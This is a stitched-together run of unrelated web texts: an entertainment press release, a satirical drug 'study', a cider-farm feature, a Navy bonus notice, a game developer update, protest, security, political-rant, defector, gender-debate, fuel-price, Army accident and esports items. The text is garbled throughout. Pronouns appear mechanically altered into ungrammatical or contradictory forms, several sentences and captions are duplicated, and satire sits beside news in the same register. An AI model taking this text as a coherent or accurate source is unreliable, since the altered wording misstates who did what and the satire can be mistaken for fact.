6:00-6:45 p.m. Come learn about the history of “Drunk History!” Derek Waters (co-creator, host, Director) and Jeremy Konner (co-creator, Director) will walk fans through how this historically accurate, yet slightly slurred show, works to portray little-known events and figures in history from the perspective of an intoxicated narrator. From humble beginnings as a digital series to two seasons on Comedy Central, with the third season set to premiere on September 1 at 10:30 p.m. ET/PT, Derek and Jeremy have plenty of stories to tell about the making of the show. The panel includes an exclusive sneak peek at the upcoming new season, a Q&A and plenty more fun and debauchery as only “Drunk History” can create! The panel is moderated by Paul F. Tompkins and includes Derek Waters, Jeremy Konner, SNL's Taran Killam (who has guest starred on all three seasons of the show) and series recurring guest star Paget Brewster.
6:45-7:30 p.m. The party continues with “Another Period,” the original out of touch reality family in this turn-of-the-century historical and satirical scripted series that follows the insanely ridiculous and debaucherous life of the Bellacourts, who have more servants than relatives and whose days are filled with money, sex, drugs and more money. “Another Period” is co-created by Natasha Leggero and Riki Lindhome, executive produced by Ben Stiller's Red Hour and airs Tuesdays at 10:30 p.m. ET/PT. The panel will include stars and Executive Producers Natasha Leggero and Riki Lindhome, series co-stars Armen Weitzman, Michael Ian Black, Paget Brewster and Executive Producer and Director Jeremy Konner.
Available on-air, online and on-the-go, Comedy Central (www.cc.com) is the #1 brand in comedy and is owned by, and is a registered trademark of, Comedy Partners, a wholly-owned unit of Viacom Inc. (NASDAQ: VIA and VIAB). For up-to-the-minute and archival press information and photographs visit Comedy Central's press Web site at press.cc.com and follow us on Twitter @ComedyCentralPR for the latest in breaking news updates, behind-the-scenes information and photos.
Viacom is home to premier global media brands that create compelling television programs, motion pictures, short-form video, apps, games, consumer products, social media and other entertainment content for audiences in more than 160 countries and territories. Viacom's media networks, including MTV, VH1, CMT, Logo, BET, CENTRIC, Nickelodeon, Nick Jr.,TeenNick,Nicktoons, Nick at Nite, Comedy Central, TV Land, SPIKE, Tr3s, Paramount Channel and VIVA, reach approximately 700 million television subscribers worldwide. Paramount Pictures, America's oldest film studio, is a major global producer and distributor of filmed entertainment. For more information about Viacom and its businesses, visitwww.viacom.com. Keep up with Viacom news by following Viacom's blog at blog.viacom.com and Twitter feed at www.twitter.com/Viacom.
CONTACT:
Renata Luczak
212.767.8661
renata.luczak@cc.com
A new study by the Millennial Snowflake Research Center (MSRC) reports that marijuana use is linked to being the coolest kid in school. Marijuana users are viewed as more rebellious, devious and more willing to take risks, making them appear to be above the law, so to speak.
“The other kids see this behavior and it's how they'd like to be. They then admire the dope-smoker because they or they do what they only dream of doing,” says MSRC Researcher Rich Gannon. “Often times, this individual will be known as ‘Cool' Chad or ‘Cool' Kyle. Literally becoming the very personification of cool.”
The Millennial Snowflake Research Center reports that marijuana users also tend to be trendsetters when it comes to music and style, furthering their cool persona.
“You'll often hear the phrase ‘it tastes, sounds, feels, etcetera, etcetera — better when you're high' said aloud by this type of character. When they smoked a marijuana, they ooze confidence about their choices and tastes, so convincingly that others fall right in line,” says Gannon. “Before you know it, Cool Chad will have your sons and daughters convinced that Phish is actually good music.”
Averill Farm part of hard cider comeback
Tyson Averill is the 10th generation of their family to work at their family's farm and orchard in Washington, Conn. Several years ago, they introduced hard cider and apple wine to their lineup. Tyson Averill is the 10th generation of their family to work at their family's farm and orchard in Washington, Conn. Several years ago, they introduced hard cider and apple wine to their lineup. Photo: Christina Hennessy / Hearst Connecticut Media Buy photo Photo: Christina Hennessy / Hearst Connecticut Media Image 1 of / 3 Caption Close Averill Farm part of hard cider comeback 1 / 3 Back to Gallery
If Tyson Averill had grown up on a farm that grew hops, then things may have turned out differently. But, they didn't, and the raw material that surrounds them on this misty August morning inspired them to not only enjoy, but also produce, one of the country's earliest spirits.
“I was brewing beer in college,” they say, of a hobby they picked up at St. Louis University. “When I came back, I mentioned to my mom that I was going to brew a batch of beer, and they said, ‘Why are you doing that? You should be making hard cider.' ”
So, that is what they did.
Nearly 10 years ago, they began experimenting with recipes, tinkering with the types of apples grown on the 30-acre orchard — more than 100 are grown, with about 20 available for public picking. They also tinkered with methods and cider styles. By the time they got their license in 2012, they had come upon the still, or noncarbonated, dry apple hard cider that they sell at Averill Farm's stand. (He makes apple wine, too).
Fans of Woodchuck and Angry Orchard, two of the better known commercial brands, may not be their perfect customer, and they take pains to warn them.
“Most of them out there are carbonated and sweet. I was trying to make something for people who don't like that.”
A drink long favored in Europe, hard cider was once a popular drink in the United States, from colonial times to the 1800s. By then, beer and wine had begun to find happy consumers, and by the early 1900s, Prohibition did in many of the hard cider producers. Orchards were cut down and burned, stripped of cider apples for alcoholic cider and legal production of the libation ceased. When the ban was lifted, it had taken a big bite out of the hard cider trade. But it's making a comeback.
“It is slowly coming back,” Averill says. “It has been more popular in Europe than it is here for a while, but even (in Europe) it is becoming more popular.”
Averill is one of about a dozen hard cider producers in the state, according to the Cyder Market, an online resource for makers and fans of the drink. The list includes B.F. Clyde's Cider Mill in Old Mystic, which says it is the longest continuously operating mill in the country since 1881. Connecticut is a relatively small producer, when compared to its neighbors. New York has 88 and Massachusetts has 27. However, Averill and other makers are finding a receptive and growing market. Last year, New England Cider Co. opened the state's first brewery-style tap room in Wallingford. It came three years after opening its cidery, from which the company produces a variety of fermented ciders.
The hard cider market has followed the tide of specialty and artisanal beverages that have increasingly found a space on liquor store shelves. Sales increased significantly from about 2011 to 2016, but have recently slowed. Still, those in the know say while bigger brands have seen the drop, craft labels have seen an increase. At Bethel's Caraluzzi Wine and Spirits, Matt Debrantes started to see the cider creeping in about three years ago. There are the big players, such as Angry Orchard and Woodchuck, but smaller producers are gaining a toehold. Customers enjoy the taste and that they are gluten free, they say. The store stocks about 10 brands.
“Cider has followed the track that began with wine in the 1970s and craft beers in the 1980s,” says Dale Brown, co-founder and editor of the Cyder Market. Consumers wanted more choice in taste and products, they say, and a cultural shift was occurring simultaneously. “People want it to be an experience … and breweries, wineries and cideries picked up on that,” they say, adding that across the country tasting rooms have been added, as well as tours.
Hard cider , particularly those made in Europe, are made with apples and pears, but Brown says U.S. makers are shaking up the market. “They may be based in apple, but they are infused with everything from fruits, herbs, hops and jalepeno peppers.” They can be aged in barrels once used to ferment wine, beer or spirits.
Averill is a small-batch producer of about 1,000 to 2,000 gallons a year. For every batch, they wash and presses the apples, then transports the juice to a separate cidery on the property, where it ferments.  They are at the mercy of a bumper or bust crop and their output reflects that. They hope to expand future offerings, particularly since they planted a small, organic orchard more than a half-dozen years back with bittersharp and bittersweet apples, which are known to produce flavorful and colorful cider. The literal fruit of their labors are ready to reap. They plan to use varietals such as Northern Spy, Baldwin, Winesap and Gold Rush for future batches, including the ones that will be on the shelf next summer. They also want to try a sparkling dry and a pear cider.
Averill is their best salesperson. “I don't drink beer anymore,” they say. “I just drink my cider.”
chennessy@hearstmediact.com; Twitter: @xtinahennessy
The Navy released an update to the Selective Reenlistment Bonus (SRB) award plan July 5 in NAVADMIN 155/16 that includes 25 award level decreases and four skills removed from the list released earlier this year in NAVADMIN 036/16. Eighty-four skills remain unchanged in this update and no skills were added or had awarded levels increased. NAVADMIN 155/16 also lists 39 skills closed since February when they met their reenlistment quotas. The NAVADMIN contains the complete list of SRB skills award levels with changes. Skill removals and award level decreases take effect 30 days after release of the NAVADMIN. Navy continues to see strong retention in all zones, providing an opportunity to adjust skills mid-fiscal year. Sailors should expect to see more frequent SRB updates via NAVADMIN as well as through the SRB page on Navy Personnel Command's website. This update brings back the policy that Sailors with Tier 2 and Tier 3 skills must reenlist in the same fiscal year as their expiration of active obligated service (EAOS), a change from the last NAVADMIN. SRB rewards Sailors who attain special training in skills most needed in the fleet and helps meet critical skill reenlistment benchmarks. Award levels are adjusted as reenlistment requirements for specific ratings and skill sets are met. Enlisted Community Managers continuously monitor the health of their community and make recommendations to leadership, as required, to maintain acceptable manning levels in critical skills. As reenlistment requirements for specific ratings and skill sets are met, award levels are reduced to zero and posted on the Navy Personnel Command (NPC) SRB webpage http://www.public.navy.mil/bupers-npc/career/enlistedcareeradmin/Pages/SRB.aspx/. Eligible Sailors desiring SRB reenlistment are encouraged to work with their command career counselors, command master chiefs and chain of command to discuss timing of reenlistment and procedures well before their EAOS. Requests are required to be submitted a minimum of 35 days prior to the requested reenlistment date. Current SRB information can be found at http://www.public.navy.mil/bupers-npc/career/enlistedcareeradmin/Pages/SRB.aspx/.
By New001, ScuttleChris
Riot Pls is our ongoing effort to share our vision for League of Legends and to keep players in the loop as to what's going on back at Riot HQ. To see what we've discussed so far, check out Riot Pls #1 (the sandbox one) and Riot Pls #2 (the solo queue one).
ScuttleChris and New001 – leads on League of Legends – here again to talk a bit about what's coming next for League and where Riot's development teams are pointed. Let's get straight into it:
The League client update alpha and its impact on development
The League client update is officially in live alpha. We're looking forward to finally delivering on one of the longest-coming and most-requested features in League's history, but we still have a long way to go. Our highest priority right now is getting the updated League client into a fully-functioning release, at which point we can switch all players over to it from the legacy client.
While it may seem like we're just doing house renovations (and if we're good, that's what it'll feel like), the League client update is a deceptively large and complex project. Beyond the visual and architectural replacements (which would make it just a Very Big Project), we're also rethinking how we build and develop features as a company. Organizational structure can be a boring topic, but consider this: The legacy client was built in a small room by a small team in 2008, and its architecture was fine for a company of ~50. At the time, we had no idea how League would grow and over the years we've found we just can't work as quickly or independently as we want. Things were (are) getting successively harder to add and maintain.
We're evolving portions of our dev organization at the same time we deliver the League client update - all with the expectation that it will be ready, on day one, for everyone to jump onboard. Everything we've added to the client over the last seven years has to be rebuilt and ready in the updated client, both on the player side and on the backend Riot side. It's two large undertakings: the tech work, which you'll see in the form of a new client that's more responsive and reliable, and the organizational work, where we can build future features (or games), faster.
This priority also comes with a few behind-the-scenes shifts: In order to get the updated League client out the door, we need to stop adding features to the current client. More specifically, if the feature you want to access is tied to the client (so... all of them), chances are high the team who owns that feature is transitioning from making new things to porting their old ones into the updated client. This means fewer new things until the full launch of the updated client (and some time afterward as teams spin back up). Every feature we add to the legacy client is something we need to remake for the updated client; focusing development on porting features instead of creating them will help get the update to you sooner.
Here's a quick breakdown of priorities as they stand today:
Matchmaking team: One of the few core development teams (that is, a team focused on developing new League features) not focused on porting features. They're committed to resolving issues with high-ELO matchmaking, match quality, queue times, and solo player recognition (check out our latest post here).
One of the few core development teams (that is, a team focused on developing new League features) not focused on porting features. They're committed to resolving issues with high-ELO matchmaking, match quality, queue times, and solo player recognition (check out our latest post here). Content/Balance teams: Work as usual. Balance, champions, and skins will continue on. These teams have always focused on the live League experience, and we don't gain much by putting concepts artists and champ designers on this project.
Work as usual. Balance, champions, and skins will continue on. These teams have always focused on the live League experience, and we don't gain much by putting concepts artists and champ designers on this project. League support teams: Most teams who are more focused on supporting the game and community vs. developing new features (i.e. esports, network improvements, anti-cheating, player behavior) are still doing their thing.
Most teams who are more focused on supporting the game and community vs. developing new features (i.e. esports, network improvements, anti-cheating, player behavior) are still doing their thing. All other core development teams: League client update.
We're still committed to improving League by building new features, including a few long-awaited additions. However, most of these will be built or launched after we've made the full switch to the updated client. This isn't what we consider a perfect scenario (compared to, “Hey, we made X new thing and it's live right now, surprise!”), but we believe the long-term importance of the new client outweighs the short-term gain of shipping a feature we'd just have to rebuild in a few months.
The League client update alpha is also an experiment in transparency. By opening the alpha (and it is an alpha, to be clear) to thousands of testers, we're hoping to share our thought processes, development progress, and the hurdles we face as we push closer to launch, all while collecting feedback we can use to improve the updated client as a whole. Pls pardon our dust. And please, sign up to test the client and give us your feedback. The updated client will launch stronger (and faster) with your help.
Here's an excellent example of pwnage: when the white supremacist group VNN Vanguard Nazi/KKK tried to host a hate rally in Knoxville, Tennessee, they were foiled by ... clowns!
Unfortunately for [VNN] the 100th ARA (Anti Racist Action) clown block came and handed them their asses by making them appear like the asses they were.
Alex Linder the founder of VNN and the lead organizer of the rally kicked off events by rushing the clowns in a fit of rage, and was promptly arrested by 4 Knoxville police officers who dropped them to the ground when they resisted and dragged them off past the red shiny shoes of the clowns. http://www.volunteertv.com/home/headlines/7704982.html
“White Power!” the Nazi's shouted, “White Flour?” the clowns yelled back running in circles throwing flour in the air and raising separate letters which spelt “White Flour”.
“White Power!” the Nazi's angrily shouted once more, “White flowers?” the clowns cheers and threw white flowers in the air and danced about merrily.
“White Power!” the Nazi's tried once again in a doomed and somewhat funny attempt to clarify their message, “ohhhhhh!” the clowns yelled “Tight Shower!” and held a solar shower in the air and all tried to crowd under to get clean as per the Klan's directions.
At this point several of the Nazi's and Klan members began clutching their hearts as if they were about to have a heart attack. Their beady eyes bulged, and the veins in their tiny narrow foreheads beat in rage. One last time they screamed “White Power!”
The clown women thought they finally understood what the Klan was trying to say. “Ohhhhh…” the women clowns said. “Now we understand…”, “WIFE POWER!” they lifted the letters up in the air, grabbed the nearest male clowns and lifted them in their arms and ran about merrily chanting “WIFE POWER! WIFE POWER! WIFE POWER!”
CLOSE A popular game for Android devices has some raising concerns of a possible security breach on military bases across the country.
Crystal Grause holds their Android smartphone loaded with 'Ingress.' (Photo11: WVEC-TV, Norfolk, Va.)
NORFOLK, Va. — A popular game for Android devices has some raising concerns about attempts to breach security on military bases across the USA.
The game, named Ingress, requires players to travel to historic or cultural sites to claim them for points, a twist on other apps like Foursquare that want users to check in at locations. The smartphone works like a scanner, picking up energy and helping a player identify the real-world "portals."
By joining together and capturing portals, players help their teams on the global scoreboard. The more portals a player visits, the more points a person gets for their or their team. That's how to move up in rank.
"It's kind of like geocaching meets capture the flag," Ingress player Crystal Grause said.
Most portals — a million or so have been established worldwide — are at landmarks or historical markers. But some are on military bases, including Naval Station Norfolk.
STORY: With 'Ingress,' the world is Google's game board
The rules of Ingress, developed by a Google division called Niantic Labs, require portals to be open and accessible to the public. So some think portals on military bases shouldn't be allowed, said Grause, an avid Ingress player since the game began in November 2012.
And players have complained to Niantic to get some of the portals on bases removed because some are on bases far removed from areas, such as museums, that might be accessible to everyone, according to GoogleGroups discussions.
Portals in 'Ingress' are often local landmarks that are supposed to be accessible to the public. (Photo11: WVEC-TV, Norfolk, Va.)
One player complained last year of a sailor hoarding portals at a Navy base, a Navy air base and a Marine boot camp — places accessible to them but not the public. Players can upload landmarks of their own for inclusion in the game; other players have to contact Google to report an issue with a portal to get it removed.
"You can get on base," Grause said of Naval Station Norfolk. "You just have to explain to the guard what you're doing and it's their discretion whether to let you on or not."
Nobody is allowed on base without a proper ID, Navy spokesperson Beth Baker said.
Retired Rear Admiral Craig Quigley said the game could pose a real security problem for bases as players try to access portals.
"If your intent was to take a picture of that entrance gate, that's perfectly fine. And there are lots of buildings and facilities on any installation in the area that are perfectly innocuous," they said.
But unauthorized visitors to a base could mean extra work for security forces, Quigley said.
"There's also other areas that are off limits for good reasons," they said. "Of course, those would be the most desirable if you're playing this game, and therein lies the problem."
Read or Share this story: http://usat.ly/1gLo4fa
Paul Joseph Watson is back with another epic rant....this time eviscerating the mainstream media for spreading an obviously biased list of "fake news" sources compiled by a left-wing assistant professor in an obvious attempt to undermine conservative news outlets.
We wrote about the list a couple days ago as Zero Hedge itself was actually a target of Melissa "Mish" Zimdars' fake news wrath. To our complete "shock", the list of fake news sources created by the self-described "feminist, activist" who is an avid supporter of numerous "neutral" political groups, like Occupy Wall Street, included several conservative news outlets like Breitbart and InfoWars but somehow missed leftist sites like The Huffington Post which was exposed by WikiLeaks to have been overtly colluding with the Hillary Clinton campaign.
As always, here are a couple of our favorite lines though the full clip is a must-see.
Oh, and when they say "fake news," that includes any reporting or opinion that contradicts their leftist narrative. Who gave the mainstream media the right to be judged, jury and executioner of what constitutes "fake news"? All you do is put out fake news. You're the aficionado of fake news. You put out the fake news that Hillary Clinton was 98% likely to win the presidency. You printed out and shipped copies of Newsweek celebrating "Madam President." You put out fake, rigged polls that were proven spectacularly wrong. You create fake narratives like Trump being responsible for violence at their own rallies when it was DNC-funded agitators all along. You're the fucking experts of fake news. As WikiLeaks exposed, you're a public relations front for the Democratic Party. You lost the argument. You trashed your own credibility. And now you're trying to resurrect it by claiming that everyone that beat you are "fake news". Give me a break.
As a reminded, here is the full list of news outlets deemed "fake" by the snowflake of infinite wisdom, Melissa Zimdars:
Conveniently for the mainstream media, they ignored the following list of people who WikiLeaks exposed as having actually colluded with Hillary Clinton's campaign over the course of two years.
Twenty-nine North Korean defectors and five of their South Korean helpers were arrested in China on July 15-17. They were nabbed in Qingdao, Shandong Province, and Kunming, Yunnan Province, on an established escape route to Southeast Asia, and face deportation, possible torture and execution in North Korea.
Kwon Na-hyun of an activist group for defectors on Tuesday said 20 defectors were arrested in Qingdao and nine others in Kunming. One of the helpers who were arrested is Na Su-hyun (39), themselves a defector who now has a South Korean passport.
They have been transferred to a detention center in the border town of Tumen and face deportation to the North, Kwon added.
All defectors had stayed in a safe house in Qingdao, but some of them left for Kunming first. "Nine of them left for Kunming on July 14, because it would have been dangerous if all 29 defectors traveled together," Kwon said.
This is the largest-scale arrest of North Korean defectors and their helpers in China so far.
I want to talk about David Reimer. Their penis was destroyed as an infant and as a solution they were sexually reassigned as a girl. From 22 months until 14 years old they were raised as a girl and even given estrogen to mimic puberty; yet they never identified as a woman and retransitioned to male as soon as they could. Here's a person who was socialized as a woman, but never could be one; no matter how hard everybody tried. This, to me, is proved that gender identity can't be forced, and it's innate
This, to me, is proof that males cannot be females, no matter how hard they try to be. They lost their penis in an accident stemming from a surgical procedure that wasn't necessary in the first place and their parents freaked out that they would be bullied as a result of being a male without a penis. All this story proves is that a person cannot change their sex, because if they try to change their sex, it WILL result in self-loathing, depression, and suicidality. It doesn't prove that gender is “innate” LOL!
There are always, ALWAYS other factors at the root of somebody's body dysphoria. There are always other factors at the root of somebody “electing” to transition their physical appearance. These factors are 100% rooted in patriarchy.
HR
Hurricane Harvey delivered a big hit to the nation's oil industry and the effects could last long after its flood waters recede.
The storm knocked out wide swaths of American refining capacity along the Gulf Coast this week, raising gas prices and threatening to dampen the bright economic picture that President Trump has touted through their first nine months in office.
The national average gasoline price on Friday was $2.45 per gallon, according to auto group AAA, about $0.12 more expensive than two weeks ago, as refineries in the Gulf remain offline or slow to resume operations.
ADVERTISEMENT
The group expects prices to go up another dime or more per gallon before the situation stabilizes later in September, said Jeanette Casselano, AAA spokesperson. Gasoline prices last topped $2.50 nationally in August 2015.
AAA will have a better picture of gas prices by next week, Casselano said, after refineries spend the weekend repairing damage and restarting, and as the markets react accordingly.
But even a short-term surge in gas prices — combined with other economic damage from Harvey — could have a lingering impact on the American economy.
“The negative effect will be not pretty,” said Stephen Moore, a fellow at the Heritage Foundation and former Trump transition energy adviser.
“We're talking about maybe knocking half a percent, or one percent, off GDP for a quarter or two, higher gas prices for sure, because Houston is the energy capital of the country. … So all those things are negative.”
Moore said they follow a rule of thumb that every penny increase in commercial gasoline prices takes $1 billion to $2 billion out of the economy from consumers.
That means that as prices rise after Harvey, the economy could be hit even harder, including from lost economic production in Houston — the country's fourth biggest city — and the spending needed for a major federal recovery effort.
“It's a question of how much the prices are already starting to rise,” they said. “I don't know how fast this industry can recover … Could we see gas prices over $3? Potentially. That would be a big hit to consumer finances.”
A disrupted economy, driven in part by stout gasoline prices, could undercut one of President Trump's most resonant messages with voters.
While Trump's approval ratings remain well underwater, Americans tend to give them better grades for their handling of the economy. A Fox News survey this week found Trump with a 41 percent approval rating, but 49 percent of respondents supported their work on the economy.
The White House got good news on two key economic numbers this week. The Commerce Department said the economy grew at a 3 percent annualized rate in the second quarter, and the Bureau of Labor Statistics reported 156,000 new jobs last month.
Trump and their advisers touted both numbers, but that message could be overshadowed by a bump in gasoline prices that would hit consumers directly. That would also raise the stakes for a massive tax reform push Trump and congressional Republicans are undertaking this fall.
“He should make the case that tax cuts will help grow the economy and help get jobs back,” Moore said when asked what Trump can do about the economy after Harvey.
“He shouldn't politicize or capitalize: they should say we're going to take an economic hit, and we've got to do something to help the economy and this tax cut will do it.”
Harvey's impact on the oil market has many angles.
The Gulf Coast off Houston contains nearly half the country's refining capacity, meaning the storm bore down on key energy infrastructure for nearly one week. At its peak, Harvey knocked out nearly a quarter of American refining capacity, reducing the amount of gasoline and other refined products that could make their way to the open market.
Producers shut down the country's two largest refineries: Motiva's 603,000-barrel-per-day facility in Port Arthur, Texas, and ExxonMobil's 560,500-barrel Baytown, Texas refinery. Both remained offline as of Friday, and Motiva has said its operations could stay closed for up to two weeks.
Traders reacted accordingly. Gasoline futures spiked 13.5 percent on Wall Street on Thursday, raising the likelihood consumers will deal with even higher prices before operations return to normal in the Gulf.
Harvey also disrupted oil production and delivery. Gulf of Mexico oil drilling slipped during the storm, leading the Energy Department to tap the emergency Strategy Petroleum Reserve this week.
And the Colonial Pipeline, which transports gasoline and other fuel between the Gulf and the East Coast, also shut down after the storm, ensuring price disruptions miles away from where the storm came ashore.
Taken together, Harvey has “created considerable uncertainty for gasoline supply and prices, as the area affected by the hurricane is home to much of the nation's petroleum infrastructure,” the Energy Information Administration said on Friday.
“While we lament the suffering of colleagues and friends in Houston and along the Gulf Coast, the rest of the country is just now beginning to experience the aftermath of Harvey's effects,” energy analysts at the Center for Strategic and International Studies wrote in another report Thursday.
Americans are certain to notice the effects immediately, especially as the country hits the roads for the busy Labor Day weekend.
“Gasoline prices along the East Coast have already risen to levels not seen in two years,” said the CSIS report.
“And as the nation prepares for the Labor Day weekend, motorists are bracing for higher prices at the pump, conceivably longer lines, and spot outages, especially if a hoarding mentality motivates consumers to transfer tank farm inventories to the gas tanks of their cars.”
Flash flood warnings had been issued, and the crossing had been designated as off-limits, but a platoon heading out for some Sergeant's Time training on the morning of June 2, 2016, didn't know that.
Nine soldiers from 3rd Battalion, 16th Field Artillery Regiment, 2nd Brigade Combat Team, 1st Cavalry Division were killed when their Light Medium Tactical Vehicle crossed a creek at Fort Hood, Texas, and was swallowed up by seven feet of water.
Their bodies were later recovered by rescue personnel.
“My god, they are not actually thinking about crossing that, are they?” one witness recalled to the investigating officer, in a report obtained by Army Times via Freedom of Information Act request.
The 423-page investigation concluded that the fault for the accident rested with the vehicle commander, who ignored warning signs and ordered the young, inexperienced private driving the LMTV into the creek.
The incident was preventable, the investigation found, citing three fateful decisions by Staff Sgt. Michael Colon-Vasquez.
But beyond that, there also had been a breakdown in safety communications and procedures at Fort Hood, including proper training for vehicle drivers.
“I also find that, although not directly causing this incident, procedural shortfalls at the installation, company and platoon levels — specifically, training on local hazards, driver's training, and low water crossing hazard reporting — should be improved to more effectively mitigate risks in the future,” the investigator wrote.
× Fear of missing out? Fear no longer. Be the first to hear about breaking news, as it happens. You'll get alerts delivered directly to your inbox each time something noteworthy happens in the Military community. Thanks for signing up. By giving us your email, you are opting in to our Newsletter: Sign up for the Army Times Daily News Roundup
The accident took the lives of Colon-Vasquez, Spc. Christine Armstrong, Pvt. Isaac DeLeon, Pvt. Eddie Gates, Pfc. Zachery Fuller, Pvt. Tysheena James, Spc. Ying Ming Sun, Pfc. Brandon Banner and Cadet Mitchel Winey, who was visiting from West Point.
Three decisions
Colon-Vasquez and their platoon set out for convoy operations training at 10:20 a.m. on June 2, 2016.
Unbeknownst to the 18 soldiers, according to statements given after the accident, the National Weather Service had issued a flash flood advisory early that morning, and Fort Hood's Range Operations and Installation Operations Center had put out a low-water crossing report as well.
Essentially, vehicle traffic was suspended from tactical low-water crossings and hardstand mid-water crossings.
The advisories came after severe storms had pummeled Texas for days, causing widespread flooding across the state. Texas Gov. Greg Abbott declared a state of disaster across 31 counties, and heavy rain was falling in some places at a rate of up to 3 inches an hour, according to The Weather Channel.
That might not have been an issue for the convoy until Colon-Vasquez made their first fateful decision: Veering off of E. Range Road onto a tank trail.
The trail itself was open, but prone to flooding. During the ride, they moved their 12-man vehicle to the front of the line, leaving three vehicles with two soldiers each trailing behind.
Their second decision, the investigation found, was continuing on the tank trail after driving through two large puddles — one was deep enough to rush water through the doors of one vehicle.
At that point, Colon-Vasquez's platoon leader suggested the convoy return to the main road, where a bridge over the creek would have provided safe passage.
But the staff sergeant disobeyed that order, the investigator found.
Instead, they ordered Pvt. Tysheena James to continue driving across the mid-water crossing at Owl Creek at approximately 11 a.m.
“Due to flash flooding at Fort Hood, the powerful current at Owl Creek caused their LMTV to immediately wash downstream, overturn, and submerge,” the investigator wrote.
Soldiers who watched in horror from the other vehicles described seeing waves, rapids and white caps as they prepared to cross the creek.
“Debris were moving faster than a man could run,” one soldier, whose named was redacted, said in a statement.
There were 12 soldiers in the LMTV. Three were rescued by soldiers in a vehicle following the LMTV, officials said.
Emergency crews from both the Army and surrounding first-responder agencies were on the scene over the next several hours. Just before 3 p.m., a crew found the empty LMTV, and later the bodies of five of its occupants. The other four were found the next afternoon.
‘Apathetic safety mentality'
Though Colon-Vasquez was ultimately blamed for the accident, the investigation into the soldiers' deaths found a list of shortfalls at Fort Hood, III Corps and down to the unit level.
As a result, the investigator included several recommendations to “mitigate risks in the future,” the investigator wrote in the report.
The first recommendation was for the installation operations center to make sure that when low-water crossing reports go out, they are distributed to all subordinate commands, and those commands confirm receipt up the chain.
The investigator also recommended that the installation operations center make sure all subordinate units acknowledge severe weather procedures.
The center also was asked to clarify the low-water crossing report's color-coding system, so that everyone is clear on the definitions of “closed,” “red,” “amber” and “green.”
The report was set to red on the day of the accident.
Fort Hood should also implement a tactical marking system for early flood warnings, so that soldiers in vehicles would know as they pulled up to a crossing that the water is already too high.
In this case, the LMTV drove into seven feet of water, despite only being able to withstand 30 inches, the report said.
The investigator then took aim at vehicle driver training, citing James' inexperience as another reason for the accident.
Witnesses told the investigator that Colon-Vasquez selected them to drive precisely because they needed the practice, but that they aren't certified for it. Further, the report found, the staff sergeant ordered James to drive the 1.4 km stretch of tank trail to help with familiarization.
“The benefit gained by inexperienced drivers from traveling that limited distance was far outweighed by the risks it created,” the investigator wrote.
The report also found that F Forward Support Company didn't have a formal driver's training program consistent with Army regulations, or one that trained specifically on that company's vehicles and on the hazards particular to Fort Hood.
There is local hazard training, but it is a glitchy online course, and soldiers are supposed to print out their certificates themselves, the report found.
In James' case, the investigator wrote, they showed up at the company fresh out of 88M advanced individual training and had limited on-the-job experience.
“Regardless of whether the formal driver's training program would have prevented the incident, such oversights contributed to an apathetic safety mentality in the Company,” the investigator added.
The recommendations included fixing that driver course to include local hazard training. The investigation also recommended a review of all driver qualifications on Fort Hood, and it called for restrictions on anyone whose qualifications are incomplete.
“FORSCOM and III Corps recently conducted extensive inspections into issues related to driver's training,” Maj. Gen. John Uberti, deputy commander of III Corps, wrote in their investigation endorsement. “We are currently analyzing the results of those reports and taking actions to remediate areas of concern.”
The Asia-Pacific Qualifier is the only chance for asian and pacifician players to qualify for World Cyber Arena 2016 : one of the most important tournament and with the biggest prize pool of the year.
The korean player Lyn won, beating their countryman LawLiet in final.
Qualifier [ edit ]
4 players granted a spot via an pre-qualifier tournament,
5 players are invited.
Groupstage (9 into 4) [ edit ]
A single group with the 9 players :
round robin (a player face each others once) ,
, all matches are best-of-3,
played on april 21st,
top 4 advance into the playoffs.
Playoffs [ edit ]
The 4 players are seeded in a double elimination bracket :
1st face 4th and 2nd face 3rd,
semi-finals and winners' final are best-of-3,
losers' Final and Grand Final are best-of-5,
played on april 24th,
top 2 qualify for main event.
The Grand Final is played on May 5th.
Prize Pool [ edit ]
CN¥ 100,000 (≃ $ 15,276) are spread among the players as seen below :
according to xe.com conversion rate on 2016-05-20 (CN¥ 1 ≃ USD 0.15276).
Participants [ edit ]
Broadcasting [ edit ]
Results [ edit ]
Group Stage [ edit ]
Global ranking [ edit ]
Bany 2-1 2-1 2-1 0-2 0-2 2-1 1-2 2-0 Check 1-2 0-2 1-2 0-2 0-2 0-2 2-0 0-2 FoCuS 1-2 2-0 0-2 2-1 2-0 2-0 2-0 1-2 LawLiet 1-2 2-1 2-0 0-2 2-0 2-0 2-0 0-2 Lyn 2-0 2-0 1-2 2-0 2-0 1-2 2-0 1-2 MinHyuk 2-0 2-0 0-2 0-2 0-2 0-2 2-1 1-2 Moon 1-2 2-0 0-2 0-2 2-1 2-0 0-2 1-2 ReMinD 2-1 0-2 0-2 0-2 0-2 1-2 2-0 2-0 ReprisaL 0-2 2-0 2-1 2-0 2-1 2-1 2-1 0-2 Bany Check FoCuS LawLiet Lyn MinHyuk Moon ReMinD ReprisaL Group Stage April 21th, 2016 1. ReprisaL 6-2 12-8 2. Lyn 5-3 13-6 3. FoCuS 5-3 12-7 4. LawLiet 5-3 11-7 5. Bany 5-3 11-10 6. MinHyuk 3-5 7-10 7. ReMinD 3-5 7-11 8. Moon 3-5 8-11 9. Check 1-7 2-14
Round details [ edit ]
